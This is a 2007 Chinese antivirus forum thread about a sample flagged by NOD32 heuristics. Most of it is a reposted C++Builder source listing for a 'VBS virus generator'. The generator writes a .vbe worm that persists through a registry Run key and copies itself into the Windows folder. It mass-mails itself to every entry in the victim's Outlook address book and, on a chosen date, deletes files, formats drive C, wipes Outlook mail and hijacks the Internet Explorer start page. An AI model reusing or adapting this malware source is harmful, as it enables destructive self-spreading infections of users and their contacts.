3f031f，NOD启发！

显示全部楼层 · 发表于 2007-9-14 07:52:28

原帖由 jhtl 于 2007-9-14 00:17 发表
是病毒，不是误报啊

运行过了再说话。。。。

显示全部楼层 · 发表于 2007-9-14 07:59:02

驱逐舰过！！

费尔过！！

显示全部楼层 · 发表于 2007-9-14 08:28:44

本身不是exe，是个网页，几个都报的恶意脚本，应该不是误报。如果是误报，那它可能是报网页中文本的代码：
[转载]VBS病毒生成器核心源代码此程序可以生成病毒 [ 日期：2007-03-24 ] [ 来自：本站原创 ]
信息来源：邪恶八进制信息安全团队
该程序来源于网络上，是我们收集来供大家研究交流，根据作者说：
程序经过加壳压缩后仅200来K，但由于窗口文件较多，所以文件比较杂乱，所以把核心文件整理出来，供大家参考。其中注册功能未公开实属无奈之举，有看不懂的问题可以向zsy2@citiz.net来信询问。
以下程序在windows ME用C++Builder5.0编译通过。欢迎和高手一起探讨开发，不得将下列代码在媒体发表。
　
unit1.cpp
//-----------------------------------------
#include
#include
#include
#pragma hdrstop
#include "Unit2.h"
#include "Unit3.h"
#include "Unit1.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
Tform1 *form1;
//---------------------------------------------------------------------------
__fastcall Tform1::Tform1(TComponent* Owner)
: Tform(Owner)
{
}//---------------------------------------------------------------------------

//---------------------------------------------------------------------------
void __fastcall Tform1::Label1Click(TObject *Sender)
{
ShellExecute(Handle,NULL,"http://zsyangel.yeah.net",NULL,NULL,SW_SHOWNORMAL);
}
//---------------------------------------------------------------------------

//--------------------------------------------------------

void __fastcall Tform1::CheckBox3Click(TObject *Sender)
{
if (CheckBox3->Checked==true)
{
Edit8-> Enabled=true;
Edit8->Color=clHighlightText;
Edit9-> Enabled=true;
Edit9->Color=clHighlightText;
Edit10-> Enabled=true;
Edit10->Color=clHighlightText;}
else
{Edit8-> Enabled=false;
Edit8->Color=clBtnFace;
Edit9-> Enabled=false;
Edit9->Color=clBtnFace;
Edit10-> Enabled=false;
Edit10->Color=clBtnFace;}
}
//--------下面数行用来限制按健，防止无效数据，造成溢出-------------------------------------------------------------------

void __fastcall Tform1::CheckBox4Click(TObject *Sender)
{
if(Edit4->Enabled==true)
{Edit4->Enabled=false;}
else
{Edit4->Enabled=true;}
}
//---------------------------------------------------------------------------

//---------------------------------------------------------------------------

void __fastcall Tform1::Edit4KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit8KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit9KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit10KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit5KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit4Exit(TObject *Sender)
{
AnsiString edit4=Edit4->Text;
if (StrToInt (edit4)<1||StrToInt (edit4)>10000)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit4->Text="";}
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit8Exit(TObject *Sender)
{
AnsiString edit8=Edit8->Text;
if (StrToInt (edit8)<1982||StrToInt (edit8)>2050)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit8->Text="2001";}
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit9Exit(TObject *Sender)
{
AnsiString edit9=Edit9->Text;
if (StrToInt (edit9)<1||StrToInt (edit9)>12)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit9->Text="1";}
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit10Exit(TObject *Sender)
{
AnsiString edit10=Edit10->Text;
if (StrToInt (edit10)<1||StrToInt (edit10)>31)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit10->Text="1";}
}
//---------------------------------------------------------------------------

//---------------主要代码------------------------------------------------------------

void __fastcall Tform1::BitBtn1Click(TObject *Sender)
{
AnsiString g=Edit1->Text+".vbe";//在当前目录下生成VBE文件
i=FileCreate(g );
AnsiString a1=""Created by " ;
AnsiString a=Edit2->Text;
AnsiString b="\r\n";
AnsiString z=a1+a+b;
char c[1000];
strcpy(c, z.c_str());
FileWrite(i,c,strlen(c));
if (CheckBox1->Checked==true)//让病毒修改注册表项
{AnsiString a3=" Dim wsh\r\n Set wsh=CreateObject(\"WScript.Shell\")\r\n on error resume next \r\n wsh.regwrite \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\kv3000\",\"c:\\windows\\";
AnsiString a31=Edit1->Text;
AnsiString a32=".vbe\"\r\n";
AnsiString a33="Set fso= Createobject\(\"Scripting.FileSystemObject\"\)\r\nSet InF=fso.OpenTextFile\(WScript.ScriptFullname,1\)\r\nDo While InF.AtEndOfStream<>True\r\nScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf \r\nLoop\r\nSet OutF=fso.OpenTextFile\(\"c:\\windows\\";
AnsiString a34=Edit1->Text;
AnsiString a35=".vbe\",2,true\)\r\nOutF.write ScriptBuffer\r\n ";
AnsiString a4=a3+a31+a32+a33+a34+a35;
char c1[10000];
strcpy(c1, a4.c_str());
FileWrite(i,c1,strlen(c1));
}
TabSheet1->Enabled=true;
TabSheet1->Show() ;
TabSheet0->Enabled=false;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Label4Click(TObject *Sender)
{
ShellExecute(Handle,"open","mailto:zsy2@citiz.net",NULL,NULL,SW_SHOW);
}
//---------------------------------------------------------------------------
void __fastcall Tform1::BitBtn2Click(TObject *Sender)//此几行代码负责病毒从outlook传播
{
AnsiString bb="if wsh.regread \(\"HKCU\\software\\a\\a\"\)<> \"1\" then out\r\nsub out\r\n";
AnsiString b1="On Error Resume Next\r\n";
AnsiString b2="Set Outlook = CreateObject(\"Outlook.Application\")\r\nIf Outlook = \"Outlook\" Then\r\nSet Mapi=Outlook.GetNameSpace(\"MAPI\")\r\nSet Lists=Mapi.AddressLists\r\nFor Each ListIndex In Lists\r\nIf ListIndex.AddressEntries.Count <> 0 Then\r\nContactCount = ListIndex.AddressEntries.Count\r\nFor Count= 1 To ";
AnsiString b9="ContactCount";
AnsiString b7= Edit4->Text;
AnsiString b8="\r\nSet Mail = Outlook.CreateItem(0)\r\nSet Contact = ListIndex.AddressEntries(Count)\r\nMail.To = Contact.Address\r\nMail.Subject = \"";
AnsiString b3=Edit11->Text;
AnsiString b4="\"\r\nMail.Body = \"" ;
AnsiString b5=Edit13->Text;
AnsiString b6="\"\r\nSet Attachment=Mail.Attachments\r\n Attachment.Add Folder & \" c:\\windows\\";
AnsiString bb1=Edit1->Text;
AnsiString bb2=".vbe\"\r\nMail.Send\r\nnext\r\n End if\r\nnext\r\n End if\r\nend sub\r\nwsh.regwrite \"HKCU\\software\\a\\a\", \"1\"\r\n";
if (CheckBox4->Checked==true)
{
AnsiString B=bb+b1+b2+b9+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));
}
else
{AnsiString B=bb+b1+b2+b7+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));}

TabSheet2->Enabled=true;
TabSheet2->Show() ;
TabSheet1->Enabled=false;
}
//------------------------此下代码负责破坏功能---------------------------------------------------
void __fastcall Tform1::BitBtn3Click(TObject *Sender)
{
TabSheet3->Enabled=true;
TabSheet3->Show() ;
if (CheckBox3->Checked==true)
{{AnsiString d1=" \r\nif year(date)&month(date)&day(date)= ";//设定病毒发作时间
AnsiString dyear=Edit8->Text;
AnsiString dmon_th=Edit9->Text;
AnsiString dday=Edit10->Text;
AnsiString dthen=" Then a\r\n" ;
AnsiString sub="sub a\r\n" ;
AnsiString dex=d1+dyear+dmonth+dday+dthen+sub;
char d[10000];
strcpy(d, dex.c_str());
FileWrite(i,d,strlen(d)); }
AnsiString del="on error resume next\r\nfso.DeleteFile\(\"";//负责删除指定文件
AnsiString delf=Edit6->Text;
AnsiString delf1="\"\)\r\n";
AnsiString def=del+delf+delf1;
char d[10000];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox2->Checked==true)//格式化硬盘
{AnsiString df1="\r\n set WshShell = Wscript.CreateObject\(\"WScript.Shell\"\) \r\nWshShell.Run\ (\"start.exe \/m format c:\/q\ /autotest\ /u\" \)\r\n ";
char df[10000];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
if(CheckBox5->Checked==true)
{AnsiString df2="Set Script = fso.CreateTextFile\( \"c:\\autoexec.bat\", True\) \r\nScript.writeline \"format c:\/q\ /autotest\ /u\" \r\n ";
char df3[10000];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }
if(CheckBox6->Checked==true)
{AnsiString dem="Set Outlook=CreateObject\(\"Outlook.Application\"\)\r\nSet t=s.GetNameSpace\(\"MAPI\"\)\r\nSet u=t.GetDefaultFolder\(6\)\r\nFor i=1 to u.items.count\r\nu.Items.Item\(i\).delete\r\nnext\r\n";
char dm[10000];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
char endsub[]="end sub\r\n";
FileWrite(i,endsub,strlen(endsub));
}
else
{if(CheckBox2->Checked==true)
{AnsiString df1="set WshShell = Wscript.CreateObject\(\"WScript.Shell\"\)\r\nWshShell.Run\ (\"start.exe \/m format c:\/q\ /autotest\ /u\" \)\r\n";
char df[10000];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
if(CheckBox5->Checked==true)
{AnsiString df2="on error resume next\r\nfso.DeleteFile\(\"c:\\autoexec.bat\")\r\n\Set Script = fso.CreateTextFile\( \"c:\\autoexec.bat\", True\)\r\nScript.writeline \"format c:\/q\ /autotest\ /u\"\r\n";
char df3[10000];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }}
AnsiString del="on error resume next\r\nfso.DeleteFile\(\"";
AnsiString delf=Edit6->Text;
AnsiString delf1="\"\)\r\n";
AnsiString def=del+delf+delf1;
char d[10000];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox6->Checked==true)
{AnsiString dem="Set Outlook=CreateObject\(\"Outlook.Application\"\)\r\nSet t=s.GetNameSpace\(\"MAPI\"\)\r\nSet u=t.GetDefaultFolder\(6\)\r\nFor i=1 to u.items.count\r\nu.Items.Item\(i\).delete\r\nnext\r\n";
char dm[10000];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
TabSheet2->Enabled=false;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::BitBtn4Click(TObject *Sender)//修改IE的标题开始页
{
AnsiString reg="wsh.regwrite \"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page\",\"" ;
AnsiString reg1=Edit3->Text;
AnsiString reg2="\"\r\nwsh.regwrite\"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Window title\",\"";
AnsiString reg3=Edit7->Text;
AnsiString reg4="\"\r\n";
AnsiString reg5=reg+reg1+reg2+reg3+reg4+reg5;
char REG[10000];
strcpy(REG, reg5.c_str());
FileWrite(i,REG,strlen(REG));
TabSheet3->Enabled=false;
ShowMessage("你的程序代码已保存在当前目录下");
FileClose(i);
}
//---------------------------------------------------------------------------

//注册功能暂不公开，敬请原谅……
//---------------------------------------------------------------------------

void __fastcall Tform1::formClose(TObject *Sender, TCloseAction &Action)
{
form2->Close();
}
//---------------------------------------------------------------------------
void __fastcall Tform1::formActivate(TObject *Sender)
{
form2->Hide();
}
//---------------------------------------------------------------------------

void __fastcall Tform1::BitBtn5Click(TObject *Sender)
{
AnsiString g=Edit1->Text+".vbe";
DeleteFile(g);
TabSheet0->Enabled=true;
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Button1Click(TObject *Sender)
{
form3->Show();
}
//---------------------------------------------------------------------------

void __fastcall Tform1::TabSheet0ContextPopup(TObject *Sender,
TPoint &MousePos, bool &Handled)
{
}
unit1.h
　
#ifndef Unit1H
#define Unit1H
//---------------------------------------------------------------------------
#include
#include
#include
#include
#include
#include
#include
#include
//---------------------------------------------------------------------------
class Tform1 : public Tform
{
__published: // IDE-managed Components
TPageControl *b;
TTabSheet *TabSheet2;
TTabSheet *TabSheet3;
TTabSheet *TabSheet4;
TGroupBox *GroupBox1;
TLabel *Label1;
TMemo *Memo1;
TCheckBox *CheckBox1;
TEdit *Edit1;

[病毒样本] 3f031f，NOD启发！

本帖子中包含更多资源